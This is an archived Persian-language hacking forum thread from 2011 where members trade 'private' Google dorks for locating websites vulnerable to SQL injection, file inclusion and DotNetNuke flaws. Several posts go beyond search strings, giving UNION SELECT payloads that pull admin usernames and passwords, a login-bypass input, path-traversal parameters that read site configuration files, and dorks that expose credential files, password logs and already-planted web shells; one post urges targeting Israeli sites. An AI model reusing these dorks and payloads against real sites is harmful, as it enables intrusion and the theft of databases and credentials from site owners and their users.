PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : گلچینی از بهترین Priv8 Dorks مخصوص انواع باگهای SQLi,LFI,DNN,...



صفحه ها : [1] 2

__Red.Hat__
03-09-2011, 03:04 PM
سلام و درود به همه ی بچه ها و اعضای اصلی آشیانه:

این تاپیک جهت قرار دادن انواع Priv8 Dork توسط خودم و دوستان ایجاد شده, و امیدوارم که این تاپیک پایدار باقی بمونه.

: - - - : دوستانی که موافق هستن این تاپیک پایدار بمونه لطفا فعالیت های خودشون رو شروع کنن و به بچه های دیگه هم کمک کنن تا مشکلاشون برطرف بشه, منم تا جایی که بتونم فعالیت میکنم. : - - - :


: - - - : هرگونه Dork از انواع باگ های SQL,LFI,DNN,... رو قرار بدین. : - - - :


از قرار دادن Dork به صورت تکی خودداری کنید و Dork ها رو به صورت بیش از 10 تا در این تاپیک قرار بدید.


(قوانین سایت هم لطفا بخونید تا مشکلی واسه اعضای تاپیک پیش نیاد)



با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:86::18:

__Red.Hat__
03-09-2011, 03:16 PM
مجموعه ای از چند Dork پرایویت واسه راه افتادن تاپیک



site:.be inurl:"id=" & intext:"Warning: mysql_fetch_array()"

site:.be inurl:"cid=" & intext:"Warning: mysql_fetch_array()"

site:.tw inurl:"newsid=" & intext:"Warning: mysql_fetch_array()"

site:.tw inurl:"cid=" & intext:"Warning: mysql_fetch_array()"

site:gov.it inurl:"id=" & intext:"Warning: mysql_fetch_array()"






با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید



:88::98:

HB1900H.
03-09-2011, 05:34 PM
سلام.

اینم یه دورک باگ نسبتا جدید :


dork :
inurl:wordpress/wp-content/plugins/mingle-forum

iinurl:forums/?mingleforumaction=


دوستان میتونین با یه خورده خلاقیت تعداد سایت هایی زیادی رو پیدا کنین ... مثلا سایت های کشور اسرائیل که این آسیب پذی رو دارند پیدا کنین ....

مثلا یه نمونه برا پسوند org :

inurl:.org inurl:wordpress/wp-content/plugins/mingle-forum


برای اطلاعات بیشتر از باگ :
[Only registered and activated users can see links]

__Red.Hat__
03-09-2011, 08:27 PM
چند Dork جدید از باگ SQLi


: . . : دوستان عزیز و گرامی, زیر هر یک از Dork ها طریقه تزریق SQL نوشته شده, شما با کمی خلاقیت کلی سایت می تونین اینجکت کنین, فقط با کمی خلاقیت : . . :







Dork : powered by Esselbach Storyteller CMS System Version 1.8
[Only registered and activated users can see links][Injection Query]
~~~~~
~~~~~
SQL - Microsoft JET Database Engine error
Dork : intext:"Powered by EZPub"
[Only registered and activated users can see links][SQL]
[Only registered and activated users can see links][SQL]
~~~~~
~~~~~
Dork : "POWERED BY ADAN"
[Only registered and activated users can see links][path]/view.php?prod=2'
~~~~~
~~~~~
Dork : "© Limelight Software Ltd"
[Only registered and activated users can see links]'59
[Only registered and activated users can see links][SQLi]
~~~~~
~~~~~
Dork : "Powered by DO-CMS"
[Only registered and activated users can see links][Sql]
[Only registered and activated users can see links][Sql]
~~~~~
~~~~~
Dork : "Copyright 2010, Quicktech" OR inurl:leftmenubody.php?id=
[Only registered and activated users can see links][sqli]
[Only registered and activated users can see links][sqli]
[Only registered and activated users can see links][sqli]
[Only registered and activated users can see links][sqli]
[Only registered and activated users can see links][sqli]
[Only registered and activated users can see links][sqli]
~~~~~
~~~~~
Dork: [Website Powered By ReadMore Systems
[Only registered and activated users can see links][Sql]
[Only registered and activated users can see links][sql commends]
~~~~~
~~~~~
Dork : "Created and powered by SnapProof"
[Only registered and activated users can see links][Sql]/page.php?pID=null[Sql]
[Only registered and activated users can see links]





با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:100:

S!Y0U.T4r.6T
03-10-2011, 12:36 AM
با تشکر از دوست خوبمred_hatچند تا دورک میزارم.
امید وارم مورد رضاییتون باشه.
ارور دورک:


"Warning: mysql_query()" "invalid query"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning:" "Cannot execute a blank command in"

priv


filetype:cgi inurl:"Web_Store.cgi"(jeloye= bezan:.html|id|)1
inurl:/vb/install/upgrade.php
inurl:/vb/install/install.php
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
inurl:updown.php | intext:"Powered by PHP Uploader Downloader"

CMSدورک:
"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php
"POWERED BY ZIPBOX MEDIA" inurl:"album.php"
موفق باشین...

sintax
03-10-2011, 02:01 AM
این دورکها هم برای sql هستش که خیلی خیلی مفیده.
خود دورک عملیات اینجکت رو انجام میده و به یوزر پسورد میرسید :)

inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:UNION+ALL+SELECT
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:unhex(hex(@@version))
inurl:unhex(hex(concat(username,0x3a,password)))
و همونطور که گفته شد با کمی خلاقیت میتونید خودتون اینهارو عوض کنید و تارگتهای جدید پیدا کنید.

امیدوارم مورد قبول باشه.

A.S.P.I.R.I.N
03-10-2011, 02:04 AM
دوستان ميتونيد درک های خودتون رو اين بخش پست بزاريد که يک جا جمع بشه


[Only registered and activated users can see links]

__Red.Hat__
03-10-2011, 02:12 AM
دوستان ميتونيد درک های خودتون رو اين بخش پست بزاريد که يک جا جمع بشه


[Only registered and activated users can see links]






درورد به مدیر بخش A.S.P.I.R.I.N :

اون تاپیک که شما در پست بالا معرفی کردید واسه مجموعه کلی درک هاست,
ولی در این تاپیکی که من به کمک دوستان عزیزم ایجاد کردم فقط بهترین درک ها و درک های پرایویت قرار داده میشه که دوستان بتونن استفاده کنن و مشکل یا درخواستشون رو بگن.

اما در تاپیکی که دوست عزیز آقای hashor درست کردن مجموعه کلی (مثلا 5000 درک یک جا) قرار داره که بیشتر اعضای سایت آشیانه وقت کافی واسه تست کردن و گشتن دنبال تارگت رو ندارن, لذا من از دوستان خواهش دارم که درک ها رو همینجا بگن تا بچه های دیگه سر دو راهی گیر نکنن و واسشون مشکلی پیش نیاد.





با تشکر از شما مدیر بخش و کلیه ی اعضای آشیانه.

__Red.Hat__
03-10-2011, 02:50 AM
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require



با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:98::15:

S!Y0U.T4r.6T
03-10-2011, 06:19 PM
سلام بعضی از دوستان برای تمرین شل با کمبود شل برمیخورن.
چندتا دورک که برای منprivهستش رو براتون می زارم.
اگه این تایپک پر بازدید باشه دوباه می زارم.درغیر این صورت واسه چی خودمو زحمت بدم.


MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON
intitle:cyber anarchy shell
"CGI-Telnet Unit-x Team Connected to *.com" OR "CGI-Telnet Unit-x Team Connected to"
"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *"

امیدوارم مورد رضایت باشه.
موفق باشین...

hoss67
03-10-2011, 07:30 PM
این از من مبتدی
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=more_details.php?id=secti on.php?section=
bookDetails.php?id=idlechat/message.php?id=rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
********.php?cid=
********.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=product_detail.php?product_id=
product.php?pid=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?****=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
[Only registered and activated users can see links]
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/view****.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=

Mast3rJ0int
03-10-2011, 11:30 PM
درود !
یه چند تا دورک آوردم که خودم ازش استفاده میکنم و فکر میکنم مفیده :


inurl:"id=" & intext:"group_concat(...,0x3a,...)

اگه خلاقیت داشته باشین میتونید تغیر های مهمی بدین !
مثلا با این یوزر و پس ها رو نشون میده :


inurl:"id=" & intext:"group_concat(username,0x3a,password)

امیدوارم مفید باشه !
بدرود !

__Red.Hat__
03-11-2011, 02:55 AM
این از من مبتدی
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=more_details.php?id=secti on.php?section=
bookDetails.php?id=idlechat/message.php?id=rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
********.php?cid=
********.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=product_detail.php?product_id=
product.php?pid=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?****=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
[Only registered and activated users can see links]
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/view****.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=






سلام دوست عزیز.
ممنون واسه اینکه تو تاپیک فعالیت می کنین و درک های خوبی هم واسه بچه ها گذاشتین,
اما چون درک های شما یه مقداری زیاده بهتر بود که داخل یه فایل .txt ذخیره می کردین و ضمیمه می کردین تا کاره بچه ها راحت تر بشه,
خیلی ممنون و با تشکر از شما و بقیه ی اعضای فعال این بخش.



با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید



:100::39:

nahayat
03-11-2011, 09:31 AM
کسی درک برای باگ rfi و lfi و dnn نداره؟
همش شد sql

S!Y0U.T4r.6T
03-11-2011, 10:07 AM
کسی درک برای باگ rfi و lfi و dnn نداره؟
همش شد sql
سلام دوست عزیز دوتا دورک خوب دارم ازینا استفاده کن:

dork:inurl:showcat.asp?id=
بعدش اینو بهش اضافه کنید:
admin/dbedit.asp?table=products
به این صورت میشه:
[Only registered and activated users can see links]

بعدش ازت user&passمی خواد که باید اینو بزنی:
user&pass: 'or''=' 1
اون یک اضافه هست.

دورکlfi:


inurl:"extras/update.php" intext:mysql.php -display
بعدش تو سایت هایی که ارور داد یه؟بهشون اضافه کن ودستور های زیز به اون اضافه کن:
read_me=0&readme_file=../catalog/includes/configure.php
read_me=0&readme_file=../index.php

موفق باشین

nomanmubasher
03-11-2011, 11:52 AM
من يك هفته است كه دنبال يك سايت آسيب پذير ميگردم لطفا معرفي كنيد...

__Red.Hat__
03-11-2011, 03:05 PM
من يك هفته است كه دنبال يك سايت آسيب پذير ميگردم لطفا معرفي كنيد...



لطفا اسپم نکنید دوستان.
دوست خوب من به تاپیک زیر مراجعه کن, Shell & Training
روزانه تعداد زیادی سایت آسیب پذیر واسه تمرین بچه ها قرار داده میشه.


[Only registered and activated users can see links]






با تشکر از همه ی اعضای آشیانه و دوستان.


:80::26:

Zend
03-11-2011, 03:38 PM
با سلام


دوستان لطف کنند این جا اسپم نکنند سعی بشه فقط dork جدید گذاشته بشه دفعه بعد برخورد میشه

Private 2011 SQL Injection




show_memorial.php?id=

S!Y0U.T4r.6T
03-11-2011, 10:50 PM
سلام دوستان.باتشکر از zendدوتا دورک میزارم.
امید وارم مورد رضایت باشه:
intext:db_pass inurl:settings.ini
inurl:app/etc/local.xml
تو گوگل بزنید خودتون می فهمید(یوزر پس دیتابیس رو بهتون میده)
با تشکر
موفق باشین...

S!Y0U.T4r.6T
03-12-2011, 12:02 PM
سلام دوستان چند تا دورک میزارم براحتی میتونید وارد سایت بشید و شل اپ کنیدو...


filetype:conf inurl:proftpd.conf -sample

filetype:conf inurl:psybnc.conf "USER.PASS="

inurl:"smb.conf" intext:"workgroup" filetype:conf

filetype:ini ServUDaemon

inurl:ssl.conf filetype:conf

filetype:ini inurl:trillian.ini

filetype:conf inurl:unrealircd.conf -cvs -gentoo

inurl:vtund.conf intext: pass-cvs

filetype:ini ws_ftp pwd

intitle:index.of ws_ftp.ini

موفق باشید...

S!Y0U.T4r.6T
03-14-2011, 12:25 PM
سلام دوستان می خوام چندتا دورک عالی براتون بزارم(یمکم روشون کارکنید به نتایج خوبی میرسین):
دورک برای sqli:

inurl:sitegenius/topic.php
اینم واسه خوندن فایل های رو سایت و..(اصلاخلاقیت نمی خواد.تو گوگل بزنید بعدش ...


filetype:log cron.log

filetpe:log access.log -CVS

+htpasswd WS_FTP.LOG filetype:log

"sets mode: +k"

"sets mode: +s"

intitle:"Index Of" -inurl:maillog maillog size

index.of passlist

inurl:passlist.txt

inurl:password.log filetype:log

filetype:log inurl:"password.log"

inurl:people.lst filetype:lst

intitle:index.of config.php

inurl:config.php dbuname dbpass

inurl:nuke filetype:sql

باتشکر
امید وارم مورد رضایت باشه.

__Red.Hat__
03-14-2011, 12:48 PM
با سلام و درود به دوستان,

بنا به درخواست آقای Nahayat تعدادی از جدیدترین درک های LFI و چندتا درک قدیمی DNN قرار میدم امیدوارم که به دردتون بخوره.




LFI 2011 Google Dorks:
inurl : "gnu/index.php?doc="
inurl : "includes/header.php?systempath="
inurl : "contacts.php?cal_dir="
inurl : "/myPHPCalendar/admin.php?cal_dir="
inurl : "/agendax/addevent.inc.php?agendax_path="



DNN Google Dorks:
site:.tw inurl:tabid/*/Default.aspx
site:.nz inurl:tabid/*/Default.aspx
site:.ca inurl:tabid/*/Default.aspx
site:.id inurl:/tabid/*/language/*/Default.aspx
site: .it inurl:/tabid/*/language/*/Default.aspx
site:.hu inurl:/tabid/*/language/*/Default.aspx




دوست عزیز با کمی خلاقیت و ابتکار می تونی تارگت های خوبی پیدا کنی. (مثلا تغییر دادن مقدار Site)



با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:60::33:

ehsancompany
03-14-2011, 03:46 PM
با تشکر و قدردانی از زحمات دوست خوبم RED.HAT
امیدوارم با کمک دوستان بتونیم این تاپیکو پر محتوا ترش بکنیم
این اولین پست منه
این فایل شامل 5000 دورک فقط مخصوص SQL میشه
البته می دونم که پست من از بحث اصلی خارجه ولی فکر کنم به عنوان اولین تاپیکم بد نباشه
ولی بزودی گلچینی از این دورک ها (Priv8 Dorks)رو میزارم

---------------------------------------------------------------------------------------------------------------------------------------

ECO Team:18::cool:

__Red.Hat__
03-16-2011, 02:03 PM
Dork :
inurl:"recruit_details.php?id="
inurl:"site/scripts/recruit_details.php?id="


Vulnerability :
recruit_details.php?id=[SQL]


SQL 1 : null+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10
,11,12--

SQL 2 : null+union+select+1,2,3,4,concat(username,0x3a,pas sword),6,7,8,9,10,11,12+from+J
aduAdministrators--



با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:80::59:

solt6n
03-16-2011, 03:43 PM
یــــه لطف کنین dork xss کــه میزارین اسکریپت مخصوص خودش هم بزارین:86:
البته این یه پیشنهاد بود اگه دوستان این کارو بکنن ممنون میشیم :19:

__Red.Hat__
03-19-2011, 01:06 AM
سلام ... !
تصمیم گرفتم تا گلچینی از بهترین درک های باگ rfi رو جمع کنم و واسه دوستان بذارم ... !
امیدوارم که به کارتون بیاد ... !



[Only registered and activated users can see links]





با تشکر از همه ی اعضای آشیانه و دوستان.
تشکر شما از پست نشانه ی رضایت و خشنودی شماست...موفق باشید


:33:

S!Y0U.T4r.6T
03-19-2011, 01:28 AM
سلام دوستان یه چندتا دورک میزارم راحته راحتن.


inurl:config.php dbuname dbpass

intitle:index.of config.php

"phpinfo.php" -manual

intitle:"index of" +myd size

filetype:cnf my.cnf -cvs -example

filetype:ora ora

filetype:pass pass intext:userid

filetype:pdb pdb backup (Pilot | Pluckerdb)

"deteced an internal error [IBM] [CLI Driver][DB2|6000]"

filetype:conf inurl:psybnc.conf "USER.PASS="


امید وارم مورد رضایت باشه..

OMID_3rver
03-22-2011, 01:01 AM
سلام دوستان اینم از دورم cms زیر



SQL Injection in details.php parameter
---------------------------------------
[Only registered and activated users can see links][sql]

POC
---
[Only registered and activated users can see links] UNION SELECT 1,2,3,4,version(),6,7,8

SQL Injection in faq_details.php parameter
---------------------------------------
[Only registered and activated users can see links][sql]

POC
---
[Only registered and activated users can see links]'

SQL Injection in blog/addComment.php parameter
---------------------------------------
[Only registered and activated users can see links][sql]

POC
---
[Only registered and activated users can see links]**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--]

__Red.Hat__
03-23-2011, 07:48 PM
سلام به همه ی دوستان گلم ... !
این بار بازم با دست پر اومدم, هرچند که بیشترتون این درک ها رو دارید اما هنوز پرایویت هستند و پابلیک نشدن...!
امیدوارم به کارتون بیاد.


SQLi Priv8 Google Dorks:




inurl:(0x3a,version)
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:UNION+ALL+SELECT
inurl:+union+select+from
inurl:+union+select+pass
inurl:unhex(hex(@@version))
inurl:(login_name,0x3a,password)
inurl:unhex(hex(concat(username,0x3a,password)))



با تشکر ... !:15:

mr.0x3a
03-27-2011, 02:05 AM
5000+2000 dork sqli
تشکر یادتون نره!:66:

__Red.Hat__
04-04-2011, 06:29 PM
مجموعه ای از درک های SQLi رو قرار دادم ...!
امیدوارم که مفید باشه...!
هنوز پابلیک نشدن, موفق باشید...!



inurl:noticias_lista.asp؟idioma=
inurl:noticias_lista.asp؟pagina=
inurl:galeri_info.php?l=
inurl:gob index/index.php?sec=
inurl:gov php?exibir=
inurl:seed.pr.gov.br id=
inurl:boletin_completo.php?id=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Detalhe.jsp?id=
pic_list.asp?sort=
noticias.php?id=110
haberoku.asp?id=
cadastrar.php
editdel.asp
common-admin.asp
view_noticia.asp?id=
events.php?id=21
whatsnew.php?id=
vernotas.php?id=
notas.php?ID=
gacetilla.asp?id=
browse.php?id=2
sitegenius/topic.php?id=
editact_do.php
showmenu.php?idod=
view_notice.php?id=
edit_inform.php
artigo.asp?id=
noticias.asp?cod_noticia=
profile.php?id=
press-releases.php?id=17
content.php?Con_ID=
news_detail.asp?nid=
public.php?id=
noticiaIntegra.php?id=
noticiaIntegra.php?id=
goias.gov.br
sayfa.asp?id=
inquiry_archive.asp
noticia_visualizar.php?ID=
conteudo.php?paginaCodigo=
noticia_completa.php?id=
detalhenoticia.php?id=
noticias.php?id_noticia=
index.php?idCat=
noticias.asp?cod_noticia=
index.php?recordID=
product_detail.htm?productid=
showimages.php?idgroup=
news.php?idsn=
loadorder.php?id_sp=
forum/showtopic.php?topicId=
uffici-news.asp?id=
noticias-integra.php?id=
bview.asp?id=
VisualizarConteudo.aspx?cod=
viewPaperAbstract.php?id=
staffprofile.php?id=
viewquestion.asp?id=
noticia_detext.php?seq=
view.php?id_view=
view_rubric.php?id=
newsarchive.asp?offset=
proekti.asp?id=
Destaque.asp?id=
information.show.php?AutoID=
profilo.asp?k=
text.php?artid=
readlm.php?l_id=
special.php?id=
notizia.asp?IDnotizia=
news_show.asp?wt_id=
conteudo.php?id=
arquivo.php?pagina=
MainAnnounce2.asp?key=
cat.php?fldAuto=
index.php?options=order&mode=detail&id=
art.php?id=
vermensaje.asp?idmensaje=
site:.fr inurl:id_rubrique
frame1.asp?id=
text.phtml?id=
listar_noticia.php?id=
exibe_agenda.php?id1=
inurl:”katava.php?id=”
entries.php?ID=
conteudoDinamico.php?id=
destaques.php?id_notas=
antesdepois-detalhe.php?id=
maisnoticias.php?id_noticias=
Canal.asp?cve_canal=
mnoticias.asp?gn=
author-show.asp?authorid=
aboutus.php?id=
navigate.php?Id=
conteudo.php?conteudo=
report.asp?nid=
distreport.asp?did=
tramite.php?cod=
noticias.php?opcion=
index/index.php?sec=
NoticiasRicosurf2.asp?id=
joomla==>index.php?option=com_content&view=article&id=

S!Y0U.T4r.6T
04-16-2011, 12:27 AM
با سلام.
100دورکpriv82011براتون گزاشتم امید وارم موردرضایت باشه(مرسی از سهیل)
اگه کننده باشین مطمئن باشین که دورک های عالی هستن.:دی
موفق باشین.
بــــــــــــــدرود.

S!Y0U.T4r.6T
04-16-2011, 12:33 AM
با سلام اینم یه سری دیگه از دورک های priv8 2011برادوستان عزیز:
امید وارم مورد رضایت باشه.
موفق باشین.
بــــــــــــــدرود.
-----------------------------------------

S!Y0U.T4r.6T
04-16-2011, 12:42 AM
با سلام.دوستان گفتم ما که دیگه می خوایم فعالیت خودمون رو کم کنیم و بشینیم پایه درسو مشق.
اینارو هم براتون می زارم امید واردم مورد رضایت باشه+dorks priv8 11/01/2011
موفق باشین.
بــــــــــــــدرود.
-----------------------------------------------------------------------------------------------------------

__Red.Hat__
04-22-2011, 01:00 PM
درود.-.×.-.!

درک های جدید SQL .-.×.-.!

امیدوارم ک مورد استفاده قرار بگیره :



inurl:movieview.php?id=


inurl:plugin_view.php?id=


